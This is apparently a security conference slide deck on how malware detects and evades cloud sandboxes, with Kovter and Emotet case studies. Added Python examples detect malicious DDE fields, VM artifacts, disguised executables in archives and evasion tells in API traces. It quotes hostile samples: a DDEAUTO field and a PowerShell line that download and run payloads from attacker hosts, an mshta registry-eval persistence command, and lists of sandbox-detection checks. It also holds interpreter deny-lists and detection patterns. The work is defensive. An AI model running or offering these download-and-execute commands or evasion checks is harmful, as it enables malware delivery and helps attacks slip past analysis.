SESSION ID: AIR-F03
#RSAC

PLAYING GAMES IN THE SANDBOX—DYNAMIC ANALYSIS AND MODERN EVASION TACTICS

Michael Wood
Senior Manager, Dynamic Protection, SophosLabs
Sophos
Cloud Sandbox

[Diagram: a file arrives from the Internet; Known Good and Known Bad? are answered directly, everything else goes to Execute in the Sandbox]
What is a Cloud Sandbox useful for?

• Malware comes in all shapes and sizes…
  o Windows executables
  o Office & PDF documents
  o Scripts, Java, Windows Shortcuts
  o Zip, Tar, Rar, & archives
• Detect 0-day threats based on behavior
Example: 0-day DDE exploit

Intended use – spreadsheet data link:
{ DDEAUTO excel "C:\My Documents\Profits.xls" "Sheet1!R1C1:R4C4" \p }

Exploited use – malware download:
{ DDEAUTO cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1" }

Same field, different "application": instead of Excel the DDE server is cmd.exe, and the "topic" is a PowerShell one-liner that fetches a second stage over HTTP and hands it to a second powershell -e (encoded command). No macro and no memory-corruption exploit, only the document's own field-update feature.
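The two field codes above differ only in which program is named as the DDE server. The following is an added example, not code from the deck or from Sophos, that tokenizes a field code the way Word does (quoted strings are single arguments, `\x` tokens are switches) and separates a data link from a code-execution chain. The interpreter list and the topic markers are a hypothetical starting set, and the two sample fields are constructed from the slide.

```python
"""Added example (not from the deck): triage DDE field codes pulled from a document.

Assumptions: the field text has already been extracted (from word/document.xml,
the .doc field stream, or a sandbox's static pre-scan); INTERPRETERS and
SHELL_HINTS are a hypothetical starting set, not an exhaustive list.
"""
import re

# Word tokenizes a field code as: quoted strings are one argument each,
# everything else splits on whitespace; switches keep their leading backslash.
_TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Hypothetical deny-list: programs that turn a "data link" into code execution.
INTERPRETERS = {
    "cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "mshta", "mshta.exe",
    "wscript", "wscript.exe", "cscript", "cscript.exe", "rundll32", "rundll32.exe",
    "regsvr32", "regsvr32.exe", "certutil", "certutil.exe", "msiexec", "msiexec.exe",
}
# Substrings in the DDE topic that betray a download-and-execute chain.
SHELL_HINTS = ("powershell", "http://", "https://", "webrequest", "downloadstring",
               "downloadfile", "-e ", "-enc", "iex", "invoke-expression")


def parse_dde_field(field):
    """Return {'kind','app','topic','item','switches'} or None if this is not a DDE field."""
    body = field.strip()
    if body.startswith("{") and body.endswith("}"):
        body = body[1:-1]
    tokens = [q if q is not None else p
              for q, p in (m.groups() for m in _TOKEN.finditer(body))]
    if not tokens or tokens[0].upper() not in ("DDE", "DDEAUTO"):
        return None
    args = [t for t in tokens[1:] if not t.startswith("\\")]
    switches = [t for t in tokens[1:] if t.startswith("\\")]
    return {
        "kind": tokens[0].upper(),
        "app": args[0] if len(args) > 0 else "",
        "topic": args[1] if len(args) > 1 else "",
        "item": args[2] if len(args) > 2 else "",
        "switches": switches,
    }


def classify_dde(field):
    """Return (verdict, reasons); verdict is 'benign-link', 'suspicious' or 'not-dde'."""
    parsed = parse_dde_field(field)
    if parsed is None:
        return "not-dde", []
    reasons = []
    app = parsed["app"].lower().rsplit("\\", 1)[-1]  # drop any path prefix
    if app in INTERPRETERS:
        reasons.append(f"application is an interpreter: {parsed['app']}")
    topic = parsed["topic"].lower()
    hits = [h for h in SHELL_HINTS if h in topic]
    if hits:
        reasons.append("topic carries shell/download markers: " + ", ".join(hits))
    if parsed["kind"] == "DDEAUTO" and reasons:
        reasons.append("DDEAUTO is evaluated when the document is opened")
    return ("suspicious" if reasons else "benign-link"), reasons


# Constructed from the two field codes on the slide.
SAMPLE_FIELDS = {
    "benign": r'{ DDEAUTO excel "C:\My Documents\Profits.xls" "Sheet1!R1C1:R4C4" \p }',
    "malicious": (
        '{ DDEAUTO cmd.exe "/k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader'
        "((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw23FGS'))"
        '.GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1" }'
    ),
}


def triage_all(fields=SAMPLE_FIELDS):
    """Verdict per named field, for a batch pulled out of one document."""
    return {name: classify_dde(text)[0] for name, text in fields.items()}


if __name__ == "__main__":
    for name, text in SAMPLE_FIELDS.items():
        verdict, reasons = classify_dde(text)
        print(f"{name}: {verdict}")
        for reason in reasons:
            print("   -", reason)
```

The application token is the strongest signal and is hard for an attacker to hide, since it is the process Word will actually launch; the topic markers catch the case where a legitimate-looking server is abused with an unusual topic. Field codes can also be spread across several runs in document.xml, so extraction should concatenate the instruction text before tokenizing.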
• But what if the threat behaves differently in the Sandbox?
Evasive threats

IF is_sandbox() THEN
    something_good()
ELSE
    something_bad()
is_sandbox()

Anti-VM
  • Artifacts: files, registry keys, drivers, disk/CPU names
  • Behavior: CPU behavior
Anti-sandbox
  • Artifacts: tools or scripts, realistic hardware
  • Behavior: human-like activity
Timing
  • Explicit delay: Sleep(…)
  • Implicit delay: user interaction required
something_good()

  ExitProcess()  |  Loop forever  |  Self delete
IN THE WILD
Kovter Malware

Persistence: a value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run that runs
mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCU\software\4a9e7b11c06bee3829"); eval(ztJ4n7);

The script body lives in a registry value; the Run entry reads it back with RegRead and eval()s it, so the payload never has to exist as a file on disk.
Kovter – VM Evasion Tests

Running processes
  VBoxService.exe
  VMwareUser.exe
Registry keys
  HARDWARE\ACPI\DSDT\VBOX__
  HKLM\SOFTWARE\VMware, Inc.
Other artifacts
  \\.\vmmemctl pipe
  VMwareCopyPasteSetClipboard event
CPUID - Artifacts

Physical machine:
  CPUID vendor     -> "GenuineIntel"
  CPUID hypervisor -> 0x0
Virtual machine (KVM guest):
  CPUID vendor     -> "KVMKVMKVM"
  CPUID hypervisor -> 0x80000000

The hypervisor value is bit 31 of ECX from CPUID leaf 1 (the "hypervisor present" bit); the hypervisor vendor string comes from leaf 0x40000000, which KVM fills with "KVMKVMKVM".
CPUID - Timing

  t1 = read timestamp
  CPUID …            (under a hypervisor this is intercepted: a VM exit)
  … "GenuineIntel"
  t2 = read timestamp

CPUID cost = t2 - t1. On bare metal the instruction completes in the CPU; under a hypervisor every CPUID traps to the host, so the same measurement comes back far higher.
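Both CPUID checks, the artifact check (leaf 1 hypervisor bit and the leaf 0x40000000 vendor string) and the timing check, need the instruction to actually execute, which Python cannot do natively. The block below is an added example, not code from the deck or from pafish/al-khaser: it maps a writable+executable page, drops a tiny x86-64 stub into it and calls it through ctypes. It assumes Linux on x86-64; anywhere else, or where the W+X mapping is refused, it reports "unknown" instead of guessing. The register decoders are pure functions and work on any platform.

```python
"""Added example (not from the deck): both CPUID checks from the slides, run from Python.

Assumptions: Linux on x86-64 (the stub uses the System V calling convention).
Elsewhere, or where a writable+executable page is refused, cpuid() returns
None and vm_report() answers "unknown" rather than guessing.
"""
import ctypes
import mmap
import platform
import struct
import time

# void stub(uint32_t leaf /*edi*/, uint32_t subleaf /*esi*/, uint32_t out[4] /*rdx*/)
_CPUID_STUB = bytes([
    0xF3, 0x0F, 0x1E, 0xFA,  # endbr64            (plain NOP on CPUs without CET)
    0x53,                    # push rbx           (callee-saved, clobbered by cpuid)
    0x89, 0xF8,              # mov  eax, edi      (leaf)
    0x89, 0xF1,              # mov  ecx, esi      (sub-leaf)
    0x49, 0x89, 0xD0,        # mov  r8, rdx       (output pointer)
    0x0F, 0xA2,              # cpuid
    0x41, 0x89, 0x00,        # mov  [r8], eax
    0x41, 0x89, 0x58, 0x04,  # mov  [r8+4], ebx
    0x41, 0x89, 0x48, 0x08,  # mov  [r8+8], ecx
    0x41, 0x89, 0x50, 0x0C,  # mov  [r8+12], edx
    0x5B,                    # pop  rbx
    0xC3,                    # ret
])
_stub = None  # (mmap, ctypes function) kept alive for the life of the process


def cpuid(leaf, subleaf=0):
    """Return (eax, ebx, ecx, edx) for a CPUID leaf, or None if the stub cannot run here."""
    global _stub
    if platform.system() != "Linux" or platform.machine() not in ("x86_64", "AMD64"):
        return None
    try:
        if _stub is None:
            mem = mmap.mmap(-1, mmap.PAGESIZE,
                            prot=mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC)
            mem.write(_CPUID_STUB)
            addr = ctypes.addressof(ctypes.c_char.from_buffer(mem))
            proto = ctypes.CFUNCTYPE(None, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p)
            _stub = (mem, proto(addr))
        out = (ctypes.c_uint32 * 4)()
        _stub[1](leaf, subleaf, ctypes.addressof(out))
        return tuple(out)
    except (OSError, ValueError):
        return None


def regs_to_str(*regs):
    """Pack 32-bit registers little-endian and decode the ASCII they spell."""
    raw = b"".join(struct.pack("<I", r) for r in regs)
    return raw.decode("ascii", "replace").rstrip("\x00")


def hypervisor_present(leaf1_ecx):
    """Leaf 1, ECX bit 31: the 0x80000000 on the slide; set by every mainstream hypervisor."""
    return bool((leaf1_ecx >> 31) & 1)


def cpuid_cost_ns(samples=256):
    """Median wall-clock cost of one cpuid() round trip, or None when unavailable."""
    if cpuid(0) is None:
        return None
    costs = []
    for _ in range(samples):
        t1 = time.perf_counter_ns()
        cpuid(0)
        t2 = time.perf_counter_ns()
        costs.append(t2 - t1)
    costs.sort()
    return costs[len(costs) // 2]


def vm_report():
    """Artifacts (vendor strings, hypervisor bit) plus the timing signal, as one dict."""
    leaf0 = cpuid(0)
    if leaf0 is None:
        return {"available": False, "verdict": "unknown"}
    leaf1 = cpuid(1)
    hv_bit = hypervisor_present(leaf1[2])
    # Leaf 0x40000000 is reserved for hypervisors; only meaningful when the bit is set.
    hv = cpuid(0x40000000) if hv_bit else None
    return {
        "available": True,
        "cpu_vendor": regs_to_str(leaf0[1], leaf0[3], leaf0[2]),                 # EBX, EDX, ECX
        "hypervisor_bit": hv_bit,
        "hypervisor_vendor": regs_to_str(hv[1], hv[2], hv[3]) if hv else "",    # EBX, ECX, EDX
        "cpuid_cost_ns": cpuid_cost_ns(),
        "verdict": "virtual machine" if hv_bit else "no hypervisor reported",
    }


if __name__ == "__main__":
    for key, value in vm_report().items():
        print(f"{key:>18}: {value}")
```

Native tools wrap CPUID in rdtsc and compare cycle counts; from Python the ctypes round trip costs microseconds by itself, so treat `cpuid_cost_ns` as a coarse signal and the artifact fields as the reliable ones. A sandbox can clear the hypervisor bit and blank leaf 0x40000000 for the guest, which is exactly why the timing variant exists.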
[Chart: Evasive Activity plotted against Legitimacy]
ACTIVE EVASIONS
Document Malware
Macro Evasion: Realistic Filename
  "Is my file name only hexadecimal characters?" (a sample named by its hash is a sandbox tell)

Macro Evasion: Realistic History
  "Are there fewer than 3 recently used files?"

Macro Evasion: Blacklist Processes
  "Are there any VM or analysis tools running?"

Macro Evasion: GEO IP
  "Does the GEO IP match my target?"
Leverage #1 - Protection

is_sandbox() -> something_bad()

Probing for a sandbox is itself a behavior; a sample that runs these checks has handed the sandbox its verdict.
Leverage #2 – Bypass

Does C:\B78AE926 exist?
  No:  run evasions
  Yes: run malware

A sandbox that knows the marker creates it up front, and the sample skips its own evasions.
Leverage #3 - Vaccination

is_sandbox() == TRUE

Plant the artifacts the malware looks for on real endpoints, so that it takes the something_good() path there too.
PASSIVE EVASIONS
Documents: Some Clicks Required
Explicit Delay

powershell "sleep 300; (new-object system.net.webclient).downloadfile.Invoke('https://malware.biz/foo','%TEMP%\Local.exe') & start-process '%TEMP%\Local.exe'"

[Timeline: marks at 0 min, 2 min and 5 min; the Sandbox Analysis window ends before the 300-second sleep expires, so the download and execution never happen inside it]
Implicit Delay: Busy work

FOR i = 0; i < 500,000; i++ DO
    IsDebuggerPresent()
END FOR

[Chart: elapsed time on Bare Metal vs. Virtual Machine vs. Sandbox]

The loop is cheap on real hardware; in a sandbox that intercepts every API call the same loop eats the analysis budget before any real behavior starts.
Typical Human Input

GetLastInputInfo()   GetCursorPos()

Idle time since the last keyboard or mouse event, and cursor movement that looks like a person rather than a script.
File Structure

> unzip -l IMAGES.ZIP
  Length      Date    Time    Name
---------  ---------- -----   ----
   518144  2018-01-17 02:17   IMG_1715.jpg   <--- Windows EXE!!!
   364671  2018-01-13 12:39   IMG_1716.jpg   <--- JPEG image
   430040  2018-01-13 12:39   IMG_1717.jpg   <--- JPEG image
   452211  2018-01-13 12:39   IMG_1718.jpg   <--- JPEG image
   391279  2018-01-13 12:38   IMG_1719.jpg   <--- JPEG image
---------                     -------
  2156345                     5 files
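The listing only shows names, and the sandbox has to decide which entry to detonate. The block below is an added example, not code from the deck or from Sophos, that rebuilds IMAGES.ZIP in memory (constructed: the entries are minimal JPEG and MZ headers, not real images or a real PE) and scans every entry by magic bytes rather than by extension, also flagging the timestamp that differs from all the others.

```python
"""Added example (not from the deck): look past file extensions inside an archive.

The archive is constructed in memory to mirror the unzip listing above: four
JPEG-looking entries and one Windows executable renamed to .jpg. The bodies
are minimal headers only.
"""
import io
import zipfile
from datetime import datetime

# Magic numbers a triage script should recognise, by label.
MAGIC = {
    "pe-executable": (b"MZ",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "pdf": (b"%PDF-",),
    "zip-or-office": (b"PK\x03\x04",),
    "ole-office": (b"\xd0\xcf\x11\xe0",),
    "lnk": (b"\x4c\x00\x00\x00\x01\x14\x02\x00",),
}
EXEC_EXTS = (".exe", ".dll", ".scr", ".com", ".cpl")
EXPECTED_TYPE = {".jpg": "jpeg", ".jpeg": "jpeg", ".png": "png", ".pdf": "pdf"}


def identify(data):
    """Label of the first matching magic, else 'unknown'."""
    for label, magics in MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return label
    return "unknown"


def build_sample_archive():
    """Construct IMAGES.ZIP as on the slide; the EXE also carries the odd-one-out date."""
    buf = io.BytesIO()
    jpeg_body = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 64
    exe_body = b"MZ\x90\x00" + b"\x00" * 56 + b"\x40\x00\x00\x00" + b"\x00" * 64
    entries = [
        ("IMG_1715.jpg", exe_body, (2018, 1, 17, 2, 17, 0)),
        ("IMG_1716.jpg", jpeg_body, (2018, 1, 13, 12, 39, 0)),
        ("IMG_1717.jpg", jpeg_body, (2018, 1, 13, 12, 39, 0)),
        ("IMG_1718.jpg", jpeg_body, (2018, 1, 13, 12, 39, 0)),
        ("IMG_1719.jpg", jpeg_body, (2018, 1, 13, 12, 38, 0)),
    ]
    with zipfile.ZipFile(buf, "w") as zf:
        for name, body, stamp in entries:
            info = zipfile.ZipInfo(name, date_time=stamp)
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, body)
    return buf.getvalue()


def scan_archive(zip_bytes, sniff_len=16):
    """Return [(name, detected_type, [reasons])] for entries that deserve a closer look."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        infos = zf.infolist()
        days = [datetime(*i.date_time).date() for i in infos]
        for info, day in zip(infos, days):
            with zf.open(info) as fh:
                head = fh.read(sniff_len)          # sniff, never extract, the whole entry
            name = info.filename
            ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
            kind = identify(head)
            reasons = []
            if kind == "pe-executable" and ext not in EXEC_EXTS:
                reasons.append(f"Windows executable body behind a {ext or 'bare'} name")
            elif ext in EXPECTED_TYPE and kind != EXPECTED_TYPE[ext]:
                reasons.append(f"{ext} name but {kind} body")
            if len(days) > 2 and days.count(day) == 1:
                reasons.append("timestamp differs from every other entry")
            if reasons:
                findings.append((name, kind, reasons))
    return findings


if __name__ == "__main__":
    for name, kind, reasons in scan_archive(build_sample_archive()):
        print(f"{name}: {kind}")
        for reason in reasons:
            print("   -", reason)
```

The same walk should recurse into entries that identify as `zip-or-office`, since a .docx is itself a zip and attackers nest archives for the same reason they rename executables: whatever the sandbox chooses not to open is never detonated.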
EVASIVE TIMELINE: EMOTET
Emotet Delivery: Some Clicks Required
Emotet: Custom Loader

Jul 2017 – Decrypts in-place:  Packed EXE --decrypt--> Emotet EXE
Aug 2017 – Loader added:       Packed EXE --decrypt--> Loader EXE --> Emotet EXE
Emotet – Oct 2017, is_sandbox() v1

[Diagram: Loader EXE gains an evasions stage before handing over to the Emotet EXE]

is_sandbox() looks for:
  Strings:   sample.exe, artifact.exe, John Doe, TEQUILABOOMBOOM, Wilbert / SC, admin / SystemIT
  Files:     C:\123\email.doc, C:\email.htm, C:\email.doc
Emotet: Loader In-Memory Obfuscation

[Diagram: Loader EXE with its evasions and "busy work" routine, plus a Stolen Code region, in front of the Emotet EXE]

1. New memory region for stolen instructions
2. Steal instructions from the EXE, patch in a detour to the "busy work" routine
Emotet: Dec 2017, is_sandbox() v2

Loader Evasions V1
  • String comparisons – tested via lstrcmpA API
  • File existence – tested via CreateFileA API
  • Sandbox detected => ExitProcess()

Loader Evasions V2
  • String comparisons – inline strcmp function, no API
  • File existence – full file system enumeration via FindFirstFile API
  • Sandbox detected => repeat evasion tests, infinitely

What each change bought, and what it cost:
  • Hide sensitive strings, like "TEQUILABOOMBOOM" -> queries for sensitive data remain
  • Hide sensitive strings, like "sample.exe" -> huge increase in file system inspection activity
  • Avoid bailout "tell" -> repeated increase in file system inspection activity
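Leverage #1 above says the check is the conviction, and the V1-to-V2 comparison lists the tells that survive string hiding: identity queries with no string-compare API, a spike in Find*File calls, checks that loop instead of exiting, and, for V1, the early ExitProcess. The block below is an added example, not code from the deck or from Sophos, that scores a sandbox API trace on exactly those signals. The trace format is hypothetical, the artifact strings are the ones named on the Kovter and Emotet slides, and all three traces are constructed, not captured from real samples.

```python
"""Added example (not from the deck): turn evasion "tells" into a sandbox verdict.

Assumptions: the trace format '<ms> <api>(<args>) = <ret>' is hypothetical;
SANDBOX_ARTIFACTS come from the Kovter and Emotet slides; the three traces
below are constructed, not captured.
"""
import re
from collections import Counter

SANDBOX_ARTIFACTS = (
    "TEQUILABOOMBOOM", "John Doe", "Wilbert", "SystemIT", "sample.exe", "artifact.exe",
    "C:\\123\\email.doc", "C:\\email.htm", "C:\\email.doc",
    "VBoxService.exe", "VMwareUser.exe", "vmmemctl", "VBOX__", "VMware, Inc.",
)
IDENTITY_APIS = {"GetUserNameA", "GetUserNameW", "GetComputerNameA", "GetComputerNameW"}
COMPARE_APIS = {"lstrcmpA", "lstrcmpW", "lstrcmpiA", "lstrcmpiW", "CompareStringA", "CompareStringW"}
ENUM_APIS = {"FindFirstFileA", "FindFirstFileW", "FindNextFileA", "FindNextFileW"}
PAYLOAD_APIS = {"WriteFile", "CreateProcessA", "CreateProcessW", "InternetOpenA", "InternetOpenW",
                "WinHttpOpen", "URLDownloadToFileA", "connect", "send"}

_LINE = re.compile(r"^(?P<ms>\d+)\s+(?P<api>\w+)\((?P<args>.*)\)\s*=\s*(?P<ret>\S+)$")


def parse_trace(text):
    """Parse '<ms> <api>(<args>) = <ret>' lines into (ms, api, args, ret); junk lines are skipped."""
    events = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if m:
            events.append((int(m["ms"]), m["api"], m["args"], m["ret"]))
    return events


def analyse(events, enum_threshold=1000, bailout_ms=2000, loop_min=3, budget_ms=120_000):
    """Return {'indicators': [...], 'verdict': 'evasive' | 'no evasion tells'}."""
    indicators = []
    api_counts = Counter(api for _, api, _, _ in events)
    seen = set(api_counts)

    # 1. Artifact lookups: any argument naming a known sandbox user, file or VM tool.
    hits = sorted({a for _, _, args, _ in events for a in SANDBOX_ARTIFACTS if a in args})
    if hits:
        indicators.append("sandbox artifacts referenced: " + ", ".join(hits))

    # 2. Loader v2 tell: identity queried, but never compared through a string API.
    if (IDENTITY_APIS & seen) and not (COMPARE_APIS & seen):
        indicators.append("user/computer name queried but never compared via a string API")

    # 3. Loader v2 tell: full file-system walks show up as a spike in Find*File calls.
    enum_calls = sum(n for api, n in api_counts.items() if api in ENUM_APIS)
    if enum_calls >= enum_threshold:
        indicators.append(f"enumeration volume: {enum_calls} Find*File calls")

    # 4. Loader v1 tell: checks, then an early ExitProcess with no payload activity at all.
    exits = [ms for ms, api, _, _ in events if api == "ExitProcess"]
    if exits and exits[0] <= bailout_ms and (hits or enum_calls) and not (PAYLOAD_APIS & seen):
        indicators.append(f"bailout: ExitProcess at {exits[0]} ms after checks, no payload activity")

    # 5. Loader v2 replacement for the bailout: the same checks run again and again.
    checks = Counter((api, args) for _, api, args, _ in events
                     if api in IDENTITY_APIS or api in ("FindFirstFileA", "FindFirstFileW")
                     or any(a in args for a in SANDBOX_ARTIFACTS))
    repeated = [(key, n) for key, n in checks.items() if n >= loop_min]
    if repeated:
        (api, args), n = max(repeated, key=lambda kn: kn[1])
        indicators.append(f"evasion checks repeated {n}x, e.g. {api}({args})")

    # 6. Explicit delay: sleeping through the analysis budget.
    slept = sum(int(args) for _, api, args, _ in events if api == "Sleep" and args.isdigit())
    if slept >= budget_ms:
        indicators.append(f"explicit delay: Sleep total {slept} ms")

    return {"indicators": indicators, "verdict": "evasive" if indicators else "no evasion tells"}


# Constructed trace in the style of loader v1: API compares, file probes, early exit.
LOADER_V1_TRACE = r"""
0010 GetUserNameA(buf) = "alice"
0011 lstrcmpA("alice","John Doe") = 1
0012 lstrcmpA("alice","TEQUILABOOMBOOM") = 1
0013 lstrcmpA("alice","Wilbert") = 1
0015 GetComputerNameA(buf) = "DESKTOP-7Q2"
0016 lstrcmpA("DESKTOP-7Q2","SystemIT") = 1
0020 CreateFileA("C:\123\email.doc") = INVALID_HANDLE_VALUE
0021 CreateFileA("C:\email.htm") = INVALID_HANDLE_VALUE
0022 CreateFileA("C:\email.doc") = 0x1a4
0025 ExitProcess(0) = -
"""

# Constructed trace in the style of an ordinary document-editing session.
BENIGN_TRACE = r"""
0010 GetUserNameA(buf) = "alice"
0011 lstrcmpA("alice","Administrator") = 1
0050 CreateFileA("C:\Users\alice\Documents\report.docx") = 0x1b0
0060 WriteFile(0x1b0) = 1
0070 Sleep(100) = -
0200 ExitProcess(0) = -
"""


def loader_v2_trace(rounds=3, files_per_round=2000):
    """Constructed trace with the v2 tells: no compare API, full-disk walks, checks that loop."""
    lines = ['0010 GetUserNameA(buf) = "alice"', '0012 GetComputerNameA(buf) = "DESKTOP-7Q2"']
    ms = 20
    for _ in range(rounds):
        lines.append(f'{ms:04d} FindFirstFileA("C:\\*") = 0x40')
        for _ in range(files_per_round):
            ms += 1
            lines.append(f"{ms:04d} FindNextFileA(0x40) = 1")
        ms += 1
        lines.append(f"{ms:04d} FindClose(0x40) = 1")
        ms += 10
    return "\n".join(lines)


if __name__ == "__main__":
    for label, text in (("v1", LOADER_V1_TRACE), ("v2", loader_v2_trace()), ("benign", BENIGN_TRACE)):
        result = analyse(parse_trace(text))
        print(f"{label}: {result['verdict']}")
        for indicator in result["indicators"]:
            print("   -", indicator)
```

The v2 trace carries none of the sandbox strings, which is the whole point of the Emotet change, and is still convicted on behaviour alone: identity queried with no compare API, thousands of Find*File calls, and the same FindFirstFileA root walked three times. Tune the thresholds against your own clean-software corpus before treating the verdict as a conviction; installers legitimately enumerate large directory trees.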
Emotet: Jan 2018, Evasion Fragments

is_sandbox() disabled, but …

Dec 2017              Jan 2018
TEQUILABOOMBOOM       "T E Q U I L A B O O M B O O M"
SystemIT              "S y s t e m I T"
John Doe              Aller Doe

The check strings are still in the binary, spaced out or misspelled, even though the checks no longer run.
Emotet: Feb 2018, Evasion Retraction

[Diagram: Loader EXE keeps the Stolen Code and "busy work" stages in front of the Emotet EXE; the evasions stage is gone]
Emotet Evasive Tactic Timeline

Jul 2017  • Busy work
Aug 2017  • Loader module
Oct 2017  • is_sandbox v1
Dec 2017  • is_sandbox v2  • something_good v2
Jan 2018  • is_sandbox "off"  • Fragments remain
Feb 2018  • is_sandbox removed
TAKEAWAYS

Summary

Leverage
  • is_sandbox() == something_bad()
Battle ground
  • Infinitely many tactics, equally many defenses
Raise the bar
  • Attacks require greater depth & complexity
Predictions

Virtual machine tactics – expect decline
  • Existing mitigations, assets in the cloud
Human-like behavior – expect growth
  • Real user activity, victim profiling
Avoid detonation – expect growth
  • Dodge execution in the Sandbox altogether
Actions: Engage, Familiarize, Experiment

• Engage – your security partner's approach to evasive threats
• Familiarize – open-source tools to test anti-sandbox tactics
• Experiment – deploy your own open-source sandbox

PAFish tool      https://github.com/a0rtega/pafish
Al-Khaser tool   https://github.com/LordNoteworthy/al-khaser
Cuckoo Sandbox   https://cuckoosandbox.org/
THANK YOU